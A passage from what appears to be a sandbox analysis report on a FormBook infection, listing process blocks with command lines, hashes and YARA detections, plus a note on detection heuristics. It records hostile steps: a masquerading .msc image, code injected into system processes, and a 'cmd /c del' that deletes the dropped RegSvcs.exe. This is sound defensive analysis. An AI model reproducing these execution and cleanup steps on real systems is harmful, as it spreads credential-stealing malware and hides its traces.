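Heuristic 4 deliberately ignores a bare command name such as the "ipconfig" in "cmd /c ipconfig /release", since a token without an extension resolves through PATH and says nothing about masquerading; heuristic 2 is the one that catches oxhvi.msc running as a process image, which is the strongest single indicator in this chain because MMC console files are data, not PE images. None of the five rules depends on parent-child links, which the per-process blocks here do not carry; with a real process-creation telemetry source the same rules gain precision when chained on the parent.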

                                                                                                                                                    Target ID:8
                                                                                                                                                    Start time:09:57:19
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:oxhvi.msc bvqmcwxut.docx
                                                                                                                                                    Imagebase:0x530000
                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                    MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:10
                                                                                                                                                    Start time:09:57:22
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:09:57:22
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:12
                                                                                                                                                    Start time:09:57:22
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:ipconfig /renew
                                                                                                                                                    Imagebase:0xa70000
                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                    MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:15
                                                                                                                                                    Start time:09:57:29
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
                                                                                                                                                    Imagebase:0xc40000
                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                    Has exited:true

Target ID: 16
Start time: 09:57:29
Start date: 05/11/2024
Path: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Imagebase: 0xf90000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 09:57:30
Start date: 05/11/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff62d7d0000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000011.00000002.2649074855.0000000010EA2000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited: false

Target ID: 18
Start time: 09:57:30
Start date: 05/11/2024
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\ipconfig.exe"
Imagebase: 0xa70000
File size: 29'184 bytes
MD5 hash: 3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited: false

Target ID: 19
Start time: 09:57:32
Start date: 05/11/2024
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\rundll32.exe"
Imagebase: 0xd80000
File size: 61'440 bytes
MD5 hash: 889B99C52A60DD49227C5E485A016679
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited: true

Target ID: 20
Start time: 09:57:33
Start date: 05/11/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Imagebase: 0xa40000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 09:57:33
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 09:57:37
Start date: 05/11/2024
Path: C:\Users\user\AppData\Local\Temp\qbmt\oxhvi.msc.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\qbmt\OXHVIM~1.EXE" C:\Users\user\AppData\Local\Temp\qbmt\BVQMCW~1.DOC
Imagebase: 0x290000
File size: 947'288 bytes
MD5 hash: 0ADB9B817F1DF7807576C2D7068DD931
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
